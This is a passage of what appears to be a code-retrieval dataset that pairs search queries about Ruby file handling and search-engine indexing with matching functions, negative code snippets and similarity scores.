"0.64534754",
"0.6441518",
"0.6430244",
"0.64292413",
"0.64292413",
"0.64266604",
"0.64222455",
"0.6414858",
"0.6411847",
"0.64100754",
"0.64063466",
"0.6401958",
"0.63986516",
"0.6390148",
"0.6388582",
"0.6386112",
"0.6386112",
"0.6384681",
"0.6381238",
"0.6372474",
"0.6371161",
"0.6361574",
"0.6356111",
"0.6354461",
"0.6346121",
"0.6344689",
"0.633951",
"0.6336964",
"0.63325155"
] | 0.80919725 | 3 |
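Each record in this dump pairs a negatives array with a parallel negative_scores array of retrieval scores. As a minimal sketch of consuming that pairing (assuming a record has already been parsed into a Ruby Hash with "negatives" and "negative_scores" keys; the ranked_negatives helper name is hypothetical):

# Pair each negative snippet with its score, highest-scoring first.
def ranked_negatives(record)
  record["negatives"]
    .zip(record["negative_scores"].map(&:to_f))
    .sort_by { |_snippet, score| -score }
end

ranked_negatives(record).first # => [top-scoring snippet, its score]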
get_file_details takes the name of a file containing the index and returns the data of each file listed in it, i.e. its name and url, as a hash table | def get_file_details(file_name)
fd = {}
# Looping through the file, pulling the name and url out of each line,
# and adding them to the hash table
File.readlines(file_name).each do |line|
data = line.split(" ")
name = data[0]
url = data[2]
fd[name] = url
end
return fd
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def file_list(hash)\n\nend",
"def file_list(hash)\n\nend",
"def get_file(url); end",
"def getFileAt(position)\n require 'rubygems/package'\n require 'zlib'\n\n @files = []\n f = File.new(@filename)\n tar_extract = Gem::Package::TarReader.new(f)\n tar_extract.rewind # The extract has to be rewinded after every iteration\n \n i = 0\n tar_extract.each do |entry|\n COURSE_LOGGER.log(entry)\n COURSE_LOGGER.log(i)\n\n if i == position then\n return nil, nil unless entry\n return entry.read, entry.full_name\n end\n\n i += 1\n end\n\n return nil, nil unless header\n\n rescue\n return nil, nil\n end",
"def index(data)\n indexH = Hash.new { |hash, key| hash[key] = [] }\n data.each_pair do |filename, tags|\n tags.each do |tag|\n if tag.is_a? Symbol\n indexH[tag] << filename\n elsif tag.is_a? Hash\n tag.each_pair do |sub_key, sub_value|\n #key = tag.keys.first\n #value = tag[key]\n value = sub_key\n indexH[sub_key] << sub_value #in case of project and sample it store (samples|projects) [(samples|projects)_name]\n indexH[sub_value]<< filename #stores for each (sample|project) name its filename so i can search directly for its name\n end\n end\n end #tags\n end #data\n indexH.each_pair do |key, value|\n indexH[key].uniq!\n end\n end",
"def get_file\n\t\t{\n\t\t\tfile_name: File.basename(file.path.to_s),\n\t\t\turl: file.url\n\t\t}\n\tend",
"def info(filename, nohash = nil)\n\tf = filename\n\tif test_file(f)\n\t\th = nohash ? (nil) : (Digest::SHA1.hexdigest(File.read(f)))\n\t\treturn [File.mtime(f), File.stat(f).mode.to_s(8).to_i, h]\n\tend\n\treturn []\nend",
"def files\n entries.map(&:filepath)\n end",
"def file_by_url(url)\n return file_by_id(url_to_id(url))\n end",
"def find_file_named name\n @files_hash[name]\n end",
"def read_filecache_index(filecache)\n CachedFile.reset_seq\n headers = []\n filecache.syswrite('ls')\n filecache.rewind\n filecache.each_line do |line|\n if line[0] == ?#\n headers = line.split\n headers.shift\n if headers[0] == 'filecache' then\n module_version = headers[1]\n end\n next\n end\n\n fields = {}\n tmp = line.split\n headers.each_index { |index| fields[headers[index]] = tmp[index] }\n\n file = fields['file']\n dev = fields['dev']\n next if file == '(noname)'\n if file.include? ?\\\\\n file.gsub! '\\011', \"\\011\" # ht\n file.gsub! '\\012', \"\\012\" # nl\n file.gsub! '\\040', \"\\040\" # sp\n file.gsub! '\\\\', \"\\\\\" # \\\n end\n\n if file =~ /\\([0-9a-f]{2}:[0-9a-f]{2}\\)/ then\n # handle block device\n # - transform file name from digital form to real ones\n fs = @@fstab[file.delete('(:)').hex]\n next unless fs\n file = fs.device_file\n dev = $BDEV_ID\n else\n # handle normal files\n # - expand file name to full path name\n # - ignore dirs/symlinks\n dev = dev[0,5].delete(':').hex\n fs = @@fstab[dev]\n next unless fs\n file = fs.mount_point + file unless fs.mount_point == '/'\n next unless File.file?(file)\n end\n\n cfile = CachedFile.new file\n cfile.dev = dev\n cfile.state = fields['state']\n cfile.ino = fields['ino'].to_i\n cfile.size = fields['size'].to_i\n cfile.cached = fields['cached'].to_i\n cfile.cachedp = fields['cached%'].to_i\n cfile.refcnt = fields['refcnt'].to_i\n cfile.process = fields['process']\n cfile.uid = fields['uid'].to_i\n cfile.accessed = fields['accessed'].to_i\n @cfile_by_name[file] = cfile\n end # filecache.each_line\n end",
"def files_hashs\n @files.map do |file|\n hash = case file\n when String\n { url: file }\n when Hash\n file.dup\n else\n raise ArgumentError, 'files must be an Array of Stings or Hashs'\n end\n\n hash[:local_path] = local_path\n hash\n end\n end",
"def fetch(filename, filesize)\n end",
"def get_file_for_url(url, params)\n selected_files = params[\"selected_files\"].values\n return unless selected_files.map { |a| a[\"url\"] }.include?(url)\n selected_files.select { |a| a[\"url\"] == url }.first[\"file_name\"]\n end",
"def files_hash\n @files_hash\n end",
"def file(fname)\n @file_list[fname]\n end",
"def file_names\n names = []\n frm.table(:class=>/listHier lines/, :text=>/Title/).rows.each do |row|\n next if row.td(:class=>\"specialLink\").exist? == false\n next if row.td(:class=>\"specialLink\").link(:title=>\"Folder\").exist?\n names << row.td(:class=>\"specialLink\").link(:href=>/access.content/, :index=>1).text\n end\n return names\n end",
"def read_summary(fname)\n hash={}\n # Read file\n File.open(fname,'r') do |f|\n # Loop over line\n f.each_line do |line|\n line.chomp!\n index,content = line.split(/\\s*==\\s*/)\n hash[index] = content # index:id, content:path\n end\n end\n return hash\nend",
"def find_nth_file(basename, index = T.unsafe(nil)); end",
"def file_list\n end",
"def files\n array = []\n @list.each do |k,v|\n array += v.filename\n end\n array\n end",
"def get_files(version)\n my_state = get_state(version)\n my_files = {}\n\n my_state.each do |digest, filepaths| # filepaths is [Array]\n filepaths.each do |logical_filepath|\n # look up this file via digest in @manifest.\n physical_filepath = @manifest[digest]\n # physical_filepath is an [Array] of files, but they're all the same so only need 1.\n my_files[logical_filepath] = physical_filepath[0]\n end\n end\n my_files\n end",
"def analyze_404\n selected_files.each do |file_name|\n result = [file_name[0,6], 0, 0]\n url = ''\n File.readlines(file_name).each do |line|\n if m = /Started(.*?)for/.match(line)\n url = m[1]\n end\n if m = /404/.match(line)\n p url.gsub('\"','')\n end\n end\n end\nend",
"def file\n file_names[x]\n end",
"def files\n list = []\n if @data['info'].key?('files')\n @data['info']['files'].each do |file|\n list << { 'name' => file['path'], 'length' => file['length'] }\n end\n return list\n end\n\n if @data['info'].key?('name') && @data['info'].key?('length')\n list << { 'name' => @data['info']['name'], 'length' => @data['info']['length'] }\n end\n list\n end",
"def get_list_file(url)\n\t\tdownload_html_file(url)\n\t\tdoc = Nokogiri::HTML(File.new(@tmp_html))\n\n\t\tlist = []\n\t\t# Parsing each link to find the relevant one\n\t\tdoc.css('a[@href!=\"../\"]').each do |link|\n\t\t\tlist << {\n\t\t\t\t'name' => link.text,\n\t\t\t\t'url' => link['href']\n\t\t\t}\n\t\tend\n\t\treturn list\n\tend",
"def get_file_path(v1_url)\n store.get(table_key + '_path', v1_url)\n end",
"def get_file_from_url(url)\n return $db.execute(\"SELECT * FROM files WHERE unique_url = ?\", url)[0]\nend",
"def retrieve_files_in_main_dir\n ensure_file_open!\n @file.glob('*').map do |entry|\n next if entry.directory?\n\n entry_file_name = Pathname.new(entry.name)\n [entry_file_name, entry.get_input_stream(&:read)]\n end.compact.to_h\n end",
"def file_info bucket_name, filename\n body_wrap = b2_list_file_names bucketId: (bucket_id bucket_name: bucket_name), maxFileCount: 1, startFileName: filename\n files_hash = body_wrap.files\n raise NotFound, \"#{filename} not found\" unless files_hash.size == 1\n files_hash.first\n end",
"def files\n db = Database.find(params[:id])\n @files = Dir.entries(db.path)\n @files.delete_if{|f| !f.include?'.dat'}\n @results = []\n @files.each do |entry|\n @results << {:name=>entry,:version=>db.version}\n end\n respond_to do |format|\n format.html\n format.json { render json: @results }\n end\n end",
"def list\n\t\tfiles.map! { |filename|\n\t\t\t{:title => file_to_pagename(filename), :link => filename.chomp(\".md\")}\n\t\t}\n\tend",
"def list\n\t\tfiles.map! { |filename|\n\t\t\t{:title => file_to_pagename(filename), :link => filename.chomp(\".md\")}\n\t\t}\n\tend",
"def fileid_and_filename(url)\n url.split('/').slice(-2,2) || ['', '']\n end",
"def get_file_data(key, &block)\n paths = get_paths(key) or return nil\n paths.each do |path|\n begin\n sock = http_read_sock(URI.parse(path))\n begin\n return yield(sock) if block_given?\n return sysread_full(sock, sock.mogilefs_size, @get_file_data_timeout)\n ensure\n sock.close rescue nil\n end\n rescue MogileFS::Timeout, MogileFS::InvalidResponseError,\n Errno::ECONNREFUSED, EOFError, SystemCallError\n end\n end\n nil\n end",
"def file_hash\n return @file_hash\n end",
"def get_file_details(id)\n uri = ENDPOINT + \"file/details/#{key}/#{id}\"\n data = JSON.parse(self.class.get(uri).body, :symbolize_names => true)\n Reach::Helper::convert_keys(data)\n end",
"def get_url_for_filename(filename, params)\n selected_files = params[\"selected_files\"].values\n selected_files.select { |a| a[\"file_name\"] == filename }.first[\"url\"]\n end",
"def filenames\n file_stats.map(&:filename)\n end",
"def listFileHashes\n return contentHost.listFileHashes(baseDir)\n end",
"def [](index_value)\n if index_value.is_a?(Fixnum)\n self.fetch(index_value)\n else\n self.select { |a| a.filename == index_value }.first\n end\n end",
"def filenames; end",
"def get_file(url)\n get(url).body\n end",
"def get_file_list(sequence_type,site_name)\n\n case sequence_type\n when 'asm'\n ftp_url = \"#{FTP_BASE_URLS['asm']}/#{site_name}/\"\n\n # get a file list from the FTP directory listing\n LOG.info \"Checking file list on FTP server at #{ftp_url} ...\"\n curl_res = `curl -l --progress-bar #{ftp_url}`\n print \"\\n\"\n\n file_list = curl_res.split(/\\n/).map { |f| \"#{ftp_url}#{f}\" }\n when 'rrna'\n require 'csv'\n ftp_url = \"#{FTP_BASE_URLS['rrna']}/\"\n\n # parse sample IDs from TSV sample ID map\n # linked from http://hmpdacc.org/micro_analysis/microbiome_analyses.php\n sample_ids_url = \"#{CONF_DIR}/ppAll_V35_map.txt\"\n file_list = CSV.new(File.open(sample_ids_url), { :headers => :first_row, :col_sep => \"\\t\" })\n .select { |line| line[-3] == site_name.capitalize && line[5] != 'Unavailable' }\n .map { |line| \"#{ftp_url}#{line[7]}.fsa.gz\" }\n .sort\n .uniq\n else\n raise \"Unknown sequence type '#{sequence_type}' requested.\"\n end\n\n file_list\n\nend",
"def file_list\n @file_list\n end",
"def [](index_value)\n if index_value.is_a?(Integer)\n self.fetch(index_value)\n else\n self.select { |a| a.filename == index_value }.first\n end\n end",
"def files; end",
"def files; end",
"def files; end",
"def files; end",
"def files; end",
"def files; end",
"def file_data\n @client.get_file @file_url\n end",
"def _get_file(name)\n File.read(\"%s/%s\" % [uri, name])\n end",
"def index_dump\n { id => {\n \"name\" => name,\n \"file\" => filepath.relative_path_from(Dixi.contents_dir).to_s,\n \"type\" => type,\n }\n }\n end",
"def filedocer\n suid = file_id\n Cofile.find(:all, :select => \"name\", :conditions => {:id => suid}).map(&:name)\nend",
"def files\n return get_result('files')\n end",
"def file_get_more_information(directory) \n @files = []\n @file_information = {} # {\"/directory\"=>[\"file\"], \"/directory/directory\"=>[\"file\", \"file\"]\n directory = \"#{@current_directory}/#{directory}\" unless @current_directory == \"\"\n @current_directory = directory \n Dir.chdir(\"#{directory}\") \n Dir.foreach(\"#{directory}\") { |d| @files.push(d) unless d == \".\" || d == \"..\" }\n @file_information.store(directory, @files)\n @files = []\n return @file_information\n end",
"def access_file_name\n end",
"def files\n info[\"Files\"].to_a\n end",
"def files\n results\n rescue ApiStruct::EntityError\n result\n end",
"def url_for_file(filename, anchor = T.unsafe(nil)); end",
"def get_player_hash(id)\n output = {}\n file_array = []\n File.open(\"#{get_tourney_dir(id)}/playerindex\", \"r\") do |f|\n file_array = f.read.split\n end\n file_array.each_with_index do |name, index|\n output[file_array[index]] = file_array[index+1] if index % 2 == 0\n end\n puts output\n return output\nend",
"def read_by_filename(filename)\n result = find_by_filename(filename)\n \n if result.count > 1\n result.map! { |r| read(r['_id']) }\n else\n result.blank? ? [] : [read(result.first['_id'])]\n end\n end",
"def getFile(file)\n return fileByName.fetch(file, nil)\n end",
"def iterate_over_file_paths\n parsed_file.each do |hit|\n file_path_array << hit[0]\n end\n file_path_array\n end",
"def extract\n entries.map(&:pathname)\n end",
"def find_file_named name\n @store.find_file_named name\n end",
"def get_file(file_id, file_type)\n\t\tresponse = self.auth_get(\"/weboncampus/getFile.do?tipo=#{file_type}&id=#{file_id}\")\n\t\tfilename = response[\"content-disposition\"].match(/filename=\"(.*)\"/)[1]\n\t\tlength = response[\"Content-Length\"]\n\t\treturn filename, length, response.body\n\tend",
"def file_hashes\n @file_hashes ||= file_field_sets.map do |file_field_set|\n instantiation_fields, file_fields = file_field_set.partition do |field|\n instantiation_header?(field.header)\n end\n\n file_hash = fields_to_hash(file_fields)\n file_hash['files'] = [fields_to_hash(instantiation_fields)]\n\n file_hash\n end\n end",
"def index\n @filenames = Filename.all\n end",
"def process_data(base_uri, file_name)\n puts \"\\tprocess_data(#{file_name})\"\n\n links = []\n\n ext = parser.get_extension(base_uri)\n if ext == '.css'\n # CSS\n links = parser.get_links_from_css file_name\n elsif ext == '.js'\n # JS\n links = parser.get_links_from_js file_name\n elsif %w{ .gif .png .jpg .jpeg .ico }.include? ext\n # skip\n else\n # HTML\n links = parser.get_links_from_html file_name\n end\n\n links.inject([]) do |memo, link|\n uri = build_uri(base_uri, link)\n memo << uri if uri\n memo\n end\n end",
"def files\n @files=get_endpoint('extra').keys\n end",
"def get_file_hash(fullPath)\n contents = File.read(fullPath)\n fileHash = Digest::MD5.hexdigest(contents)\n return fileHash\nend",
"def filenames\n files.map(&:filename)\n end",
"def filenames\n files.map(&:filename)\n end",
"def filenames\n files.map(&:filename)\n end",
"def file_url\n end",
"def get_digest(file, version)\n # Make a hash with each individual file as a key, with the appropriate digest as value.\n inverted = get_state(version).invert\n my_files = {}\n inverted.each do |files, digest|\n files.each do |i_file|\n my_files[i_file] = digest\n end\n end\n # Now see if the requested file is actually here.\n unless my_files.key?(file)\n raise OcflTools::Errors::FileMissingFromVersionState, \"Get_digest can't find requested file #{file} in version #{version}.\"\n end\n\n my_files[file]\n end",
"def files\n return [] unless meta?\n filename = meta['path'] + '/' + meta['filename']\n [\n Inch::Utils::CodeLocation.new('', filename, meta['lineno'])\n ]\n end",
"def get_file(url, filename, headers = {})\n request(:get, url, headers, :file => filename)\n end",
"def get_file(url, filename, headers = {})\n request(:get, url, headers, :file => filename)\n end",
"def file_entry(ref, identifier)\n out = ref[\"attachment\"] ? ref[\"fileref\"] : File.basename(ref[\"fileref\"])\n ret = if ref[\"fileref\"]\n { type: \"fileref\", ref: @documents[identifier].file,\n rel_path: ref[\"fileref\"], out_path: out }\n else { type: \"id\", ref: ref[\"id\"] } end\n %w(attachment sectionsplit index presentation-xml\n bare-after-first).each do |s|\n ret[s.gsub(\"-\", \"\").to_sym] = ref[s] if ref[s]\n end\n ret.compact\n end",
"def extract_files(hash)\n if hash['files']\n files = hash['files'].flatten.map do |file_hash|\n {\n :name => file_hash['path'].last,\n :size => file_hash['length']\n }\n end\n else\n files = [{\n :name => file_hash['name'],\n :size => file_hash['length']\n }]\n end\n end",
"def files\n i = 0\n @@arr_path.each do |path|\n if path.include?(params[:fold])\n # Remove path from current path\n @@arr_path = @@arr_path[0..i]\n @path = ''\n\n @@arr_path.each do |e| # Put path from array to @path\n @path = @path + e + ' >> '\n end\n @@temp_path = @path\n\n # Get content: folders, file, count\n @content = BrowsingFile.bind_folder params[:fold]\n @file = BrowsingFile.bind_files params[:fold]\n\n render 'index' # Reload index page\n return\n end\n i += 1\n end\n end",
"def to_hash\n return @file_table\n end",
"def source_index_hash\n result = {}\n sources.each do |source|\n\tresult[source] = fetch_source(source)\n end\n @fetcher_class.finish\n result\n end",
"def simsat_create_file_hash(fm_dir_file)\n \n file_hash = {}\n \n dir_file = File.open(fm_dir_file,'r')\n \n file_hdr = dir_file.read(CfeFile::HDR_LEN)\n\n if file_hdr[0..3] == CfeFile::CONTENT_ID\n \n fm_hdr = dir_file.read(FswConfigParam::FM_DIR_FILE_HDR_LEN)\n \n if fm_hdr[0..SimSat::FLT_REC_DIR.length-1] == SimSat::FLT_REC_DIR\n \n num_files = fm_hdr[68..71].to_s.unpack('l')\n \n files = []\n num_files[0].times do\n file_rec = dir_file.read(FswConfigParam::FM_DIR_FILE_REC_LEN)\n file_ext_index = file_rec[0..63].index('.')\n file_name = file_rec[0..file_ext_index+3].to_s\n files << file_name\n end\n \n file_hash[:event] = files.grep /^#{SimSat::EVENT_FILENAME_BASE}/\n file_hash[:sci_aux] = files.grep /^#{SimSat::SCI_AUX_FILENAME_BASE}/\n file_hash[:isim] = files.grep /^#{SimSat::ISIM_FILENAME_BASE}/\n\n else\n\n message_box(\"FM file header does not contain the expected directory #{SimSat::FLT_REC_DIR}\",false)\n \n end\n \n else\n \n message_box(\"File header does not contain cFE file identifier #{CfeFile::CONTENT_ID}\",false)\n\n end\n \n return file_hash\n \nend",
"def open_index_file\n end",
"def files\n @files.values\n end",
"def get_file(filename, branch_or_tag='master') \n\t\tlog = repo.log(branch_or_tag, filename) \n\t\treturn log.first.tree.contents.first.data\n\tend",
"def hash\n return (path + file_id.to_s).hash\n end",
"def get_imageinfo(files,props = :imageinfo)\n result=Array.new\n \n iiprop=CGI.escape(\"timestamp|user|url|dimensions|comment\")\n doc=Nokogiri::XML(open(\"http://commons.wikipedia.org/w/api.php?format=xml&action=query&prop=#{props.to_s}&titles=#{files}&iiprop=#{iiprop}\"))\n\n xp=\"//api/query/pages/page/imageinfo/ii\"\n xp=\"//api/query/pages/page/globalusage/gu\" if props==:globalusage\n\n ctr=0\n element=doc.xpath(xp).each do |element| \n img=Hash.new\n element.attributes.each do |a|\n img[a[0].to_sym]=element.get_attribute(a[0])\n end \n result << img\n \n @stockpile[\"#{@imagelist[ctr]}\"]=Hash.new unless @stockpile[\"#{@imagelist[ctr]}\"]\n @stockpile[\"#{@imagelist[ctr]}\"][props]=img\n ctr=ctr+1\n end\n result\n end",
"def buildCodeFilesHashFromFiles()\n\t\tdir = @cacheDirPath \n\t\tfilesList = Dir.glob(dir + \"**/*\").select{|e| File.file? e}\n\t\tfilesList.map.with_index{|file,index|\n\t\t\t#p \"cacheFile: \" + index.to_s if index % 1000 == 0\n\t\t\tp \"cacheFile: \" + index.to_s \n\t\t\tfilePath = dir + index.to_s + \".yaml\"\n\t\t\tfile = File.read(filePath)\n\t\t\tYAML.load(file)\n\t\t}.to_h\n\tend",
"def file_info(path)\n if manifest_entry # have we loaded our manifest yet? if so, use that sucker\n result = [manifest_entry[path], manifest_entry.flags[path]]\n if result[0].nil?\n return [NULL_ID, '']\n else\n return result\n end\n end\n if manifest_delta || files[path] # check if it's in the delta... i dunno\n if manifest_delta[path]\n return [manifest_delta[path], manifest_delta.flags[path]]\n end\n end\n # Give us, just look it up the long way in the manifest. not fun. slow.\n node, flag = @repo.manifest.find(raw_changeset[0], path)\n if node.nil?\n return [NULL_ID, '']\n end\n return [node, flag]\n end",
"def getFileValue(rootDir, keyword, delegates=Array.new)\n files = Dir[\"#{rootDir}/*\".gsub(\"//\",\"/\")]\n\n files.each do |file|\n if File.directory? file\n delegates = getFileValue(file, keyword, delegates) \n else\n basename = File.basename(file)\n if basename.downcase.start_with? keyword.downcase\n delegates.push file \n end\n end\n end\n return delegates\nend",
"def file(name)\n begin\n @name=name\n @content=get_rest(\"extra/#{@name}\")\n rescue Stingray::NotFoundError \n nil\n end\n end",
"def filename\n self.class.path(hash)\n end",
"def get_file_data files, suffix_pattern = \"\\.fastq\\.gz\"\n files = [files].flatten\n\n $NAME_PATTERN = /(.*)_S(\\d+)_L(\\d{3})_R(\\d)_(\\d{3})#{suffix_pattern}/\n # L1401_S1_L001_R1_001.fastq.gz\n # $1 = \"L1401\"\n # $2 = \"1\"\n # $3 = \"001\"\n # $4 = \"1\"\n # $5 = \"001\"\n\n sample_sheet_data = get_sample_sheet_data()\n\n\n file_data = files.collect do |file|\n base_name = File.basename(file)\n match = base_name =~ $NAME_PATTERN\n raise \"ERROR: #{file} does not match expected file name pattern\" unless match\n data = {:name => base_name, :path => file,\n :sample_name => $1, \n :lane => $3.to_i, :read => $4.to_i, :set => $5.to_i}\n barcode = sample_sheet_data[\"samples\"][$2.to_i - 1][\"index\"]\n\n if !(barcode =~ /([ATCGN]+|NoIndex|Undetermined)/)\n raise \"ERRROR: invalid barcode for sample: #{barcode}\"\n end\n data[:barcode] = barcode\n\n puts data.inspect\n data\n end\n file_data\n end",
"def files\n entries.map{ |f| FileObject[path, f] }\n end"
] | [
"0.63250715",
"0.63250715",
"0.6083411",
"0.60423857",
"0.6021029",
"0.59970486",
"0.59480125",
"0.5919553",
"0.5890083",
"0.58740073",
"0.5828078",
"0.58234",
"0.5817403",
"0.5815732",
"0.5810775",
"0.5804879",
"0.57983625",
"0.57846576",
"0.57770556",
"0.57633716",
"0.5763195",
"0.5760864",
"0.57569325",
"0.5733774",
"0.5731734",
"0.57215816",
"0.57215476",
"0.5700388",
"0.5698739",
"0.56843364",
"0.5669725",
"0.5648961",
"0.5648961",
"0.5647761",
"0.5631156",
"0.56240416",
"0.5590306",
"0.55805886",
"0.55802965",
"0.55795026",
"0.5575696",
"0.5561248",
"0.55455697",
"0.55447865",
"0.5534414",
"0.5526493",
"0.5515758",
"0.5515758",
"0.5515758",
"0.5515758",
"0.5515758",
"0.5515758",
"0.55114263",
"0.54935706",
"0.54903334",
"0.5487044",
"0.54740393",
"0.546198",
"0.5448403",
"0.54423165",
"0.54375595",
"0.5413837",
"0.5409548",
"0.5401282",
"0.539491",
"0.5377214",
"0.53734505",
"0.53699946",
"0.53668904",
"0.536392",
"0.5349458",
"0.53458",
"0.5339828",
"0.5338771",
"0.53345054",
"0.53345054",
"0.53345054",
"0.5330442",
"0.532963",
"0.5327315",
"0.53265387",
"0.53265387",
"0.53261393",
"0.532144",
"0.5320939",
"0.53191715",
"0.53134507",
"0.5313128",
"0.53087395",
"0.53069305",
"0.5301777",
"0.5298782",
"0.5284508",
"0.5279957",
"0.5274682",
"0.52717227",
"0.5268435",
"0.5262088",
"0.52584094",
"0.525813"
] | 0.6574043 | 0 |
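A minimal usage sketch for the get_file_details document above, assuming (as the reads of data[0] and data[2] imply) an index file whose whitespace-delimited lines carry the file name in the first column and its url in the third; the file name, contents, and meaning of the middle column here are hypothetical:

# Hypothetical two-line index file: name, <middle column>, url
File.write("files.idx", "home 42 http://example.com/home.html\nabout 7 http://example.com/about.html\n")

fd = get_file_details("files.idx")
fd["home"] # => "http://example.com/home.html"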
index_file takes a file and performs the tasks needed to index it in the search engine: tokenizing the page, recording its metadata, removing stop words, stemming, and updating the inverted index | def index_file(file, pages_dir, stopwords, file_data)
# Removing the dir prefix from the file name
actual_name = file.gsub(pages_dir, "")
# Building the absolute path to the file
file_path = File.expand_path(".") + "/" + file
print "Parsing HTML document: " + actual_name + " \n"
# Finding all the tokens in the file
tokens = find_tokens(file_path)
# Getting the page title, word count, and page url
page_title = get_title(file_path)
word_count = tokens.length
page_url = file_data[actual_name]
# Updating the docindex hash
$docindex[actual_name] = [word_count, page_title, page_url]
# Removing the stop words and stemming the remaining tokens
tokens = remove_stop_tokens(tokens, stopwords)
tokens = stem_tokens(tokens)
# Updating the invindex hash table with per-document term counts
for token in tokens
if $invindex.member?(token)
if $invindex[token].member?(actual_name)
$invindex[token][actual_name] += 1
else
$invindex[token][actual_name] = 1
end
else
$invindex[token] = {actual_name => 1}
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def open_index_file\n end",
"def open_index_file\n @index = File.open(@index_path, 'rb')\n end",
"def index\n # Block if this file is currently being indexed by another thread/process\n if indexing?\n while indexing?\n sleep 1\n end\n else\n self.indexing = true\n \n begin\n # Filter unparseable entries\n # TODO: Find a more efficient way to filter unparseable entries without\n # having to copy the entire file line by line\n filtered = 0\n File.open(@filtered_file, 'w') do |f|\n File.foreach(@data_file) do |line|\n begin\n parse(line)\n f.write line\n rescue\n filtered += 0\n end\n end\n end\n puts \"Filtered #{filtered} unparseable entries\" if filtered > 0 and ENV['DEBUG']\n \n # File must be sorted\n File.sort(@filtered_file, @sorted_file, \"-k#{@chr_col},#{@chr_col} -k#{@start_col},#{@start_col}n\")\n \n # and BGZipped\n BGZip.compress(@sorted_file, @bgzipped_file)\n \n # Now Tabix can index it\n Tabix.index(@bgzipped_file, @chr_col, @start_col, @end_col)\n rescue\n raise EntryFileError, \"Error indexing file #{File.basename(@data_file)} for lookup!\"\n ensure\n # Delete the temporary filtered and sorted files since they are unneeded\n File.delete(@filtered_file) if File.exist?(@filtered_file)\n File.delete(@sorted_file) if File.exist?(@sorted_file)\n self.indexing = false\n end\n end\n end",
"def index(file, needle, encoding = nil, *args, &block)\n\n file = init_file(file, encoding)\n\n # pass to scan method\n scan(file, needle, *args, &block)\n end",
"def index(file_rec)\n @index_driver.index(file_rec)\n end",
"def initialize (filename)\n @indexname = filename + \".index\" \n @data_f = File.open(filename)\n load_index \n end",
"def load_index\n construct_index unless index_valid?\n open_index_file\n end",
"def process_input_file\n\t\t\tinput_file = File.open(@params[:input_file], 'r')\n\t\t\tfile_terms = convert_contents_to_search_string(input_file.read)\n\t\t\tadd_terms(file_terms)\n\t\tend",
"def index(data_path, db_path)\n db = Xapian::WritableDatabase.new(db_path, Xapian::DB_CREATE_OR_OPEN)\n term_generator = Xapian::TermGenerator.new\n term_generator.stemmer = Xapian::Stem.new('en')\n parse_csv_file(data_path).each do |row|\n doc = Xapian::Document.new\n term_generator.document = doc\n term_generator.index_text(row['TITLE'].to_s, 1, 'S')\n term_generator.index_text(row['DESCRIPTION'].to_s, 1, 'XD')\n term_generator.index_text(row['TITLE'].to_s)\n term_generator.increase_termpos\n term_generator.index_text(row['DESCRIPTION'].to_s)\n\n ### Start of new indexing code.\n # Index the MATERIALS field, splitting on semicolons.\n row['MATERIALS'].to_s.split(';').each do |material|\n material.strip!\n material.downcase!\n doc.add_boolean_term(\"XM#{material}\") if material.length.positive?\n end\n ### End of new indexing code.\n\n doc.data = row.to_h.to_json\n idterm = \"Q#{row['id_NUMBER']}\"\n doc.add_boolean_term(idterm)\n db.replace_document(idterm, doc)\n end\nend",
"def index_pages\n debug_msg \" generating pages search index\"\n\n pages = @files.select do |file|\n file.text?\n end\n\n pages.each do |page|\n debug_msg \" #{page.page_name}\"\n record = page.search_record\n @index[:searchIndex] << search_string(record.shift)\n @index[:longSearchIndex] << ''\n record.shift\n @index[:info] << record\n end\n end",
"def initialize(index_file = INDEX_FILE)\n @terms = {}\n @index = {}\n @index_file = index_file\n if File.exists? @index_file\n @terms, @index = Marshal.load(\n File.open(@index_file, 'rb') {|f| f.read})\n end\n end",
"def build_index\n @search = RSemantic::Search.new(@documents.map(&:text), @options)\n end",
"def initialize (filename)\n @indexname = filename + \".index\" \n @data_f = File.open(filename, \"w\")\n @index_f = File.open(@indexname, \"w\") \n @cur_num = 0 \n @cur_pos = @data_f.pos # 0\n end",
"def load_index_cache(file)\n @indexes = Marshal.load(File.read(file))\n nil\n end",
"def initialize(file)\n Phobius.default_index(file, self)\n end",
"def create_index( dictionary )\n\n\t# test the existence of the index, and exit\n\tFile.stat( dictionary.index )\n\n\t# unless there is an error, so\n\trescue\n\n\t# 1 - it creates the index\n\tFile.open( dictionary.index, \"a\" ) do |index_file|\n\t\t# 2 - it opens the dictionary\n\t\tFile.open( dictionary ) do |dictionary_file|\n\t\t\t# 3 - for each word of the dictionary\n\t\t\tdictionary_file.readlines.each do |dictionary_line|\n\t\t\t\t# 4 - puts in the index the canonical form\n\t\t\t\tindex_file.puts dictionary_line.chomp.canonical\n\t\t\tend\n\t\tend\n\tend\nend",
"def transform index_file\n InputBatch.log.info \"Opened txt file for processing\"\n puts \"Opened txt file for processing\"\n InputBatch.log.info \">>Index Transformation Starts \" + Time.now.to_s\n puts \">>Index Transformation Starts \" + Time.now.to_s\n @jobs = []\n @txt_lines = File.readlines(index_file)\n txt_lines.each do |row|\n @row = row.chomp\n save_records\n end\n\n puts \">>Index Transformation Ends \" + Time.now.to_s\n InputBatch.log.info \">>Index Transformation Ends \" + Time.now.to_s\n end",
"def build_index\n say \"Building index...\"\n\n # Get size in bytes, so we know when we've hit the end.\n file_size = File.size(@filename)\n CSV.open(@filename, :encoding => 'utf-8', :headers => true) do |csvin|\n\n # Get byte offset\n line_start = csvin.tell\n\n # Then read line\n count = 0\n while((line_start = csvin.tell) < file_size) do\n\n # Load the line\n line = csvin.shift()\n\n # Load the key up to the key size only\n key = get_minimal_key(line)\n \n # Save the file offset\n # TODO: ensure random access of the cache is possible\n $stderr.puts \"WARNING: Key at byte #{line_start} of #{@filename} collides with key at byte #{@cache[key]}.\" if @cache[key]\n @cache[key] = line_start\n\n print \"\\rLine: #{count+=1} \"\n end\n end\n print \"\\n\"\n \n say \"Finished building index\"\n end",
"def phrender_index_file(index_file_path = nil)\n @phrender_index_file = index_file_path || @phrender_index_file\n end",
